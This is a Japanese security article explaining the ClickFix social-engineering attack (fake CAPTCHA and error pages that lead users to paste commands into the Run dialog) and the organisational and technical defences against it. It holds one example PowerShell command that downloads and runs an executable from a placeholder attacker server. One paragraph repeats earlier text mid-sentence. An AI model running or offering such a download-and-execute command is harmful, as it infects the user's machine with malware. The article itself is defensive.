2024年に登場し、2025年に入って急速に拡大しているClickFix(クリックフィックス)という新たなサイバー攻撃の手法があります。この攻撃は、ユーザーに正規の操作をしていると信じ込ませ、意図せずマルウェアの実行や情報送信を行わせるのが特徴です。
従来のフィッシング攻撃とは一線を画す巧妙なソーシャルエンジニアリング攻撃として、世界中のセキュリティ専門家から注目を集めています。
本記事では、ClickFixの基本概念から具体的な攻撃の流れ、効果的な対策まで、最新の情報を交えながら詳しく解説します。
ClickFixとは
ClickFixは、2024年に確認された新しいタイプのソーシャルエンジニアリング攻撃です。
名称は、ユーザーのクリック(Click)操作と、システムの不具合を修正(Fix)するという口実を組み合わせた初期の手口に由来します。
この攻撃の最大の特徴は、フィッシングサイトへ誘導し、被害者自身に悪意のあるコマンドを実行させる点にあります。一般的に、ユーザーのコマンド実行はセキュリティソフトやEDRをすり抜ける為、マルウェアがダウンロードされてもすぐに検知する事ができません。
なぜClickFixが流行しているのか
世界的にサイバー攻撃への対策が進み、セキュリティ対策製品やサービスをすり抜けるコストが上昇しました。
その為サイバー攻撃者は
・ユーザーが能動的に行動する為、組織に検知され辛い
・ユーザーを直接的に騙すため、攻撃コストが低い
上記から組織向けのサイバー攻撃に積極的に利用されています。
また、個人を対象にしたサイバー攻撃までClickFixが確認されおりTikTokではAI生成動画でインフォスティーラーを拡散させるサイバー攻撃の手口で、「通信料が安くなるコマンド」などと嘘の画面へ誘導しユーザーへマルウェアをダウンロードさせる手口も確認されています。
実際のClickFixの事例
以下が実際のClickFixの事例です。
メールから、偽のBooking.comへ誘導し、
画像:JAMESWT氏 X投稿
「ロボットではありません」の認証エラーと表示され、指定のコマンドをローカルで実行させようとします。
画像:JAMESWT氏 X投稿
前段で解説した通り、従来のマルウェア配布では、攻撃者が不正なファイルを送り付ける手法が中心でした。しかしClickFixでは、被害者が正規の操作をしていると思い込みながら、自ら攻撃者の指示に従ってしまうため、多くのセキュリティ対策をすり抜けやすいのです。
攻撃者は、偽のエラーメッセージやシステムアップデート通知、CAPTCHA認証画面など、利用者が日常的に目にするインターフェースを悪用して誘導します。こうした画面を通じて、問題を解決するため、認証を完了するため、といった名目で、PowerShellコマンドなどの悪意あるスクリプトをコピー&ペーストして実行させるのです。
2024年6月にProofpoint社が初めて公に報告して以来、多様な攻撃グループに採用が広がっています。特に2025年に入ってからは、北朝鮮・イラン・ロシアといった国家支援型APTグループによる利用も確認されています。
ソーシャルエンジニアリングとは
ソーシャルエンジニアリングとは、技術的な脆弱性を突くのではなく、人間の心理的な弱点や行動パターンを悪用してセキュリティを突破する攻撃手法の総称です。
この手法では、システムの技術的な欠陥よりも、人間の信頼性、善意、恐怖心、権威への服従といった心理的特性が攻撃の標的となります。
代表的な手法としては、正規のサービスを装った偽メールやWebサイトで認証情報を盗み取るフィッシング攻撃、事前に集めた情報を使って身分を偽り直接情報を引き出すプリテキスティング、感染したUSBメモリをわざと落として利用者にマルウェアを実行させるベイティング、従業員の後に続いて施設に侵入するテールゲーティングなどがあります。
実際、社員を装ってITサポート要員を名乗り電話をかけ、セールスフォースのアカウント情報を取得し対象企業の個人情報を窃取するサイバー攻撃も確認されいます。
これらに共通しているのは、人の心理や行動パターンを利用して、利用者自身に不正行為を手助けさせてしまうという点です。
ClickFixもまた、この系譜に連なる新しい手法であり、従来よりも自然な形で利用者に自ら攻撃を成立させる行動を取らせるのが特徴です。
他の手法との違い
ClickFixの特異性を理解するためには、既存のサイバー攻撃手法と比較するのが有効です。ここでは代表的な攻撃との違いを整理します。
ソーシャルエンジニアリングにおける革新性
ClickFixが従来のソーシャルエンジニアリングと大きく異なるのは、被害者を単に騙すだけではなく、能動的に操作に参加させる点です。攻撃者は、偽装されたエラーメッセージやCAPTCHA、システムエラーといった日常的に目にする信頼できるインターフェースを利用し、利用者に違和感を抱かせないまま操作を誘導します。
こうしてユーザー自身にコマンドを入力・実行させることで、通常のセキュリティツールや自動検知システムを回避できる仕組みとなっているのです。さらに攻撃者は、緊急性を煽ったり、権威を装ったり、他の人も同じ操作をしているように見せかけたりと、複数の心理的トリガーを巧みに組み合わせて抵抗感を薄め、被害者が自ら不正操作に踏み込むよう仕向けます。
標的型攻撃メールとの違い
従来の標的型攻撃メールは、特定の組織や担当者を狙い、偽装メールを使って不正サイトに誘導したり、添付ファイルを開かせたりすることで感染を引き起こします。目的は主に認証情報や業務データの窃取です。
これに対しClickFixは、不特定多数のユーザーを対象に正規の操作を装わせ、ローカル環境でコマンドを実行させます。
その結果、単なる情報窃取にとどまらず、直接的なマルウェア感染や権限奪取へと直結するのが特徴です。
マルウェア配布との違い
従来のマルウェア配布は、メール添付ファイルや不正なダウンロードリンクを通じて感染を広げるものでした。そのためセキュリティソフトに検知されやすいという弱点があります。
一方ClickFixは、被害者自身にPowerShellなどの正規ツールを通じてコマンドを実行させるため、ファイルレスでの感染が可能になり、検知を回避しやすいという利点があります。
総じてClickFixは、ユーザーの能動的な操作を利用することで、従来のフィッシングやマルウェア配布を回避するだけでなく、正規ツールを悪用することで検知を免れやすいという特性を持ちます。こうした点から、既存のセキュリティ対策では見逃されるリスクが高く、攻撃者にとって極めて有効な手法となっています。
マルウェア感染までの流れ
ClickFix攻撃は、誘導、偽のインターフェース表示、コマンド実行の誘導、マルウェアのダウンロードと実行、持続化と拡散、という流れで攻撃を成立させます。この流れの中で利用者を巧みに操作し、最終的にマルウェア感染へと導きます。
第1段階:初期誘導
攻撃者は検索結果の操作や不正広告、侵害されたWebサイト、さらにはSNSやメールを通じて、被害者を悪意あるサイトへ誘導します。最近の事例では、訪問者のユーザーエージェントやIPアドレスを解析し、特定の地域や時間帯に絞って攻撃を行う高度な仕組みも確認されています。
第2段階:偽のインターフェースやフィッシングサイトを表示
サイトにアクセスした利用者には、偽装されたインターフェースが表示されます。たとえば「私はロボットではありません」といった偽のCAPTCHAや、システム更新を装ったエラーメッセージ、Windows Defenderやブラウザからの偽のセキュリティ通知などが代表的です。いずれもセキュリティの問題を解決するためと信じ込ませるのが狙いです。
実際ぶファイルを送り付ける手法が中心でした。しかしClickFixでは、被害者が正規の操作をしていると思い込みながら、自ら攻撃者の指示に従ってしまうため、多くのセキュリティ対策をすり抜けやすいのです。
攻撃者は、偽のエラーメッセージやシステムアップデート通知、CAPTCHA認証画面など、利用者が日常的に目にするインターフェースを悪用して誘導します。こうした画面を通じて、問題を解決するため、認証を完了するため、といった名目で、PowerShellコマンドなどの悪意あるスクリプトをコピー&ペーストして実行させるのです。
2024年6月にProofpoint社が初めて公に報告して以来、多様な攻撃グループに採用が広がっています。特に2025年に入ってからは、北朝鮮・イラン・ロシアといった国家支援型APTグループによる利用も確認されています。
第3段階:コマンド実行の誘導
次に、被害者は画面の指示に従ってキーボードショートカットを入力し、PowerShellやコマンドプロンプトを開くよう促されます。そして、表示されたコマンドをコピー&ペーストして実行するよう誘導されます。認証完了までお待ちください、といったメッセージで不審感を抱かせない工夫も加えられます。
具体的な例:
- 「Windows + R」で「ファイル名を指定して実行」のダイアログを開かせる
- 「Ctrl + V」でクリップボードにコピーされたコマンドを、ダイアログに貼り付けさせる
- 「Enter」でコマンドを実行する
この例では、Windows 環境で利用できる「ファイル名を指定して実行」を利用してファイルを実行させるよう利用者を誘導しています。「更新を適用するための確認コマンドです」などと説明して実行させるため、利用者は悪意あるコマンドであることに気づきにくく、実行するとマルウェアのダウンロードが始まってしまいます。
貼り付けるコマンドの例としては、以下のようなものがあります。
powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'hxxps://攻撃者のサーバー/malware.exe' -OutFile $env:TEMP\\update.exe; Start-Process $env:TEMP\\update.exe"第4段階:マルウェアのダウンロードと実行
実行されたコマンドは、攻撃者のサーバーからマルウェアをダウンロードし、システムの一時フォルダーに保存、裏で起動させます。この段階で被害者の端末はすでに攻撃者の制御下に置かれることになります。
第5段階:持続化と拡散
感染後、マルウェアはレジストリやスケジュールタスクを改ざんしてシステムに定着し、ブラウザに保存された認証情報やセッション情報を窃取します。さらにネットワーク内の他のシステムへの横展開を試み、C2サーバーと通信して追加の攻撃を行います。
攻撃者は常に人間の心理を突いています。セキュリティリスクを強調して緊急性を演出したり、有名ブランドを偽装して権威性を示したり、多くのユーザーが同じ操作をしていると見せかけて社会的証明を与えたりします。
複雑な技術的操作を簡単な確認手続きとして提示することで、利用者の警戒心を抑えるのも重要な要素です。
対策の鍵は人
ClickFixに対して有効な防御を築くには、技術だけでなく人的要素を中心に据えた包括的アプローチが不可欠です。この攻撃は正規の操作に見える行為をユーザー自らに実行させるため、従来の自動検知をすり抜けやすいという特性があります。
PowerShellなど正規ツールを使わせることで、ウイルス対策ソフトやURLフィルタを回避しやすく、ユーザーの操作がそのまま感染のトリガーになります。
とりわけ「Win+R」押下からコマンドを貼り付けて実行といった通常業務では起きにくい操作が、攻撃の成功条件です。ゆえに、ユーザーが違和感を検知して止まれることが最大の抑止力になります。
ユーザーが違和感を検知できるようになるためには、人の判断・行動を支えるルールと訓練、報告を促す組織文化をセットで整えることが重要です。
ルールの整備
人の判断・行動を支えるルールとしてまず決めるべきは、どこまでが通常で、どこからが異常かという線引きです。たとえば、ヘルプデスクはコマンドのコピペ指示を原則行わない、ブラウザやOSがRunダイアログやPowerShell入力を求めることは通常ない、といった前提を明文化することで、現場の判断を助けることができます。やむを得ず例外的な対応が必要になるケースでは、社内ポータルに承認フローやチケット番号を明示する運用などが検討されます。
訓練の実施
ClickFixのような攻撃は、理屈で理解していても、忙しさや焦りの中でつい手が動いてしまうことも少なくありません。こうした事態を防ぐには、知識を蓄えるだけでなく、違和感を感じたときに自然と立ち止まれる反射を育てるための訓練が欠かせません。
長文の見慣れない文字列(コマンド)をコピペするよう求められた際に、まず5秒止まって考える、といったことを習慣化する取り組みが、現場での対応力につながります。習慣化させるためには、実際の偽CAPTCHA画面やエラーメッセージ、操作指示などを使った短時間の教育コンテンツや、定期的な模擬演習などを通じて、実際に手が止まる感覚を体験しておくことが有効です。
会議前の資料ダウンロードを妨げるような偽画面など、日常の業務文脈に近い場面を用いると、実効性が高まります。
こうした訓練は、一度きりではなく繰り返すことで効果が定着しやすくなります。内容は定期的に見直しながら、継続的に実施するよう計画しましょう。
報告文化の醸成
ClickFixのような攻撃では、早い段階で何かおかしいと報告されることで、被害を最小限にとどめることができます。そのためには、ユーザーが違和感を覚えたときに、ためらわずに報告できる環境が必要です。
誤報だったら恥ずかしい、大げさかもしれないといった心理的ハードルを下げるには、報告そのものを歓迎する仕組み、文化が大切です。
たとえば、報告してくれた人に対してありがとうと感謝を伝えることも、報告の心理的なハードルを下げる効果的な取り組みとなります。また、報告に手間がかからない仕組みも重要であり、Slackやメールなど複数の報告チャネルを用意し、スクリーンショットと簡単な説明だけで完了する体制を整備することで負担を減らす仕組みも、報告のしやすさが上がります。
報告内容は、個人のミスを責めるためではなく、再発防止や教育コンテンツの改善に役立てるという姿勢が伝わることで、現場からの情報が集まりやすくなります。報告が防御の第一歩として機能するような設計が、組織全体のセキュリティ対応力を底上げしていきます。
技術的対策による補完
人的対策のほか、技術的対策を設けることも、ユーザーの判断や行動を支えるうえで重要です。特にうっかり操作してしまった際に被害の広がりを抑えるための設計は、現実的な安全策として有効です。
たとえば、PowerShellの利用に制限をかける方法として、AppLockerやWDACを用いて一部機能を制限するConstrained Language Mode(CLM)を適用したり、Attack Surface Reduction(ASR)のルールを活用し、難読化スクリプトやOfficeマクロによるプロセス起動を抑制する設定も検討できます。
一方で、業務に必要な操作まで遮断してしまうと現場の負担が大きくなるため、OU(組織単位)やユーザーグループごとに制限のレベルを調整し、例外を明確に管理するアプローチが現実的です。DevToolsの使用や「ファイル名を指定して実行」の制限も、一般ユーザーに絞って適用するなど、業務との両立を前提とした運用が求められます。
また、実際にコマンドが実行された際のログ収集と検知も、技術的な備えとして有効です。PowerShellのScript Block Loggingやプロセス作成ログなどを活用し、-ExecutionPolicy BypassやInvoke-WebRequestといった不審なコマンド実行を可視化できるようにすることで、仮に被害が発生しても迅速な対応につなげることができます。
ClickFixのような攻撃ではPowerShellだけでなく、コマンドプロンプトや開発者ツール、JavaScriptベースのスクリプト、さらにはmshta.exeやregedit.exeなどの正規ツールが悪用される可能性もあります。こうした多様な侵入経路を前提とし、組織の利用実態に応じて、どの機能にどこまでどのように制限をかけるべきかを検討する視点が重要です。単一の機能に依存しない、多層的な制御の組み合わせが現実的な防御につながります。
こうした技術的対策は、単独で完璧に防げるものではありませんが、人が判断を間違えたときに支えてくれる手すりのような役割を果たします。人と技術のそれぞれによって影響を回避、または軽減できる設計が、現実的かつ持続可能な防御体制につながっていきます。
まとめ
ClickFixは、従来のフィッシングやマルウェア配布とは一線を画す、新しいソーシャルエンジニアリングの手法です。ユーザー自身に正規の操作を実行させることで、技術的な防御をすり抜けるという点で特に厄介な脅威となっています。
こうした攻撃に対しては、人の判断力を支えるルール・訓練・報告文化と、技術的な仕組みでの補完を両輪として組み合わせることが不可欠です。ユーザーが違和感を覚えて立ち止まれる仕組みを作りつつ、万一操作してしまった場合にも被害を抑える多層防御が現実的な対策になります。
2025年に入ってからは国家支援型グループの利用も確認されており、金銭目的にとどまらず、政治的・軍事的意図を帯びた攻撃にも発展しつつあります。今後さらに巧妙化が進む可能性を踏まえ、組織も個人も人と技術の両面で備えることが、ClickFixのセキュリティ対策の核心と言えるでしょう。
関連記事
EDRSilencerがエンドポイントセキュリティを回避する手段に悪用
サイバー攻撃の新手法「ClickFix」の被害企業が発生-LAC発表
国家支援 ハッカーがサイバー攻撃に「ClickFix」を採用-新たなソーシャルエンジニアリング 手法の解説
ハッカーがPHPの脆弱性を悪用し、日本を標的にサイバー攻撃を実行(CVE-2024-4577)
ClickFix(クリックフィックス)の実像をMicrosoftが発表-新手のサイバー攻撃の実態とは
台湾・日本を標的とする新たなサイバー攻撃 キャンペーン「Swan Vector」
TikTokの危険性を解説
ClickFix(クリックフィックス)とは?対策や実態を株式会社ラックへ聞く
SonicWall、偽装されたNetExtenderアプリによる情報窃取キャンペーンを警告
